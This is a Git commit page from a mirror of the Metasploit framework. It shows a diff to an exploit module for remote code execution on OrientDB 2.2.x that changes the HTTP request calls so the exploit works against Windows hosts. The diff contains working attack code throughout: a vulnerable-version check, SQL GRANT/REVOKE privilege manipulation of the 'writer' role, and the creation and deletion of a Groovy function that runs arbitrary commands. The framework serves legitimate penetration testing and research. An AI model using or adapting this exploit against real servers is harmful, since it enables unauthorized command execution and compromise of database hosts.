infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Orientdb 2.2.x RCE - Reverted to send_request_raw due to issues exploiting windows boxes

bug/bundler_fix
Ricardo Almeida 2017-07-26 13:59:14 +01:00
parent fe5c6dc28f
commit 30664924c8
No known key found for this signature in database
GPG Key ID: E44BDAD000B9B1E0
1 changed files with 8 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
modules/exploits/multi/http/orientdb_exec.rb
View File

@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
def check
uri = target_uri
uri.path = normalize_uri(uri.path)
res = send_request_cgi({'uri' => "#{uri.path}listDatabases"})
res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/
print_good("Version: #{res.headers['Server']}")
return Exploit::CheckCode::Vulnerable
@ -67,12 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
}
res = send_request_cgi(request_parameters)
res = send_request_raw(request_parameters)
if not (res and res.code == 201)
begin
json_body = JSON.parse(res.body)
@ -85,12 +84,11 @@ class MetasploitModule < Msf::Exploit::Remote
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
'data' => ""
}
req = send_request_cgi(request_parameters)
req = send_request_raw(request_parameters)
if not (req and req.code == 200)
begin
json_body = JSON.parse(res.body)
@ -113,12 +111,11 @@ class MetasploitModule < Msf::Exploit::Remote
request_parameters = {
'method' => 'DELETE',
'uri' => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => ""
}
rer = send_request_cgi(request_parameters)
rer = send_request_raw(request_parameters)
if not (rer and rer.code == 204)
begin
json_body = JSON.parse(res.body)
@ -159,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("Attempting to execute: #{cmd}")
@uri = target_uri
@uri.path = normalize_uri(@uri.path)
res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
if res && res.code == 200 && res.body.length > 0
begin
json_body = JSON.parse(res.body)["databases"]
@ -199,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
@uri = target_uri
@uri.path = normalize_uri(@uri.path)
res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
if res && res.code == 200 && res.body.length > 0
begin
json_body = JSON.parse(res.body)["databases"]
@ -221,12 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => "GRANT #{priv} ON #{item} TO writer"
}
res = send_request_cgi(request_parameters)
res = send_request_raw(request_parameters)
end
end
# Exploit
@ -249,12 +245,11 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => "REVOKE #{priv} ON #{item} FROM writer"
}
res = send_request_cgi(request_parameters)
res = send_request_raw(request_parameters)
end
end
end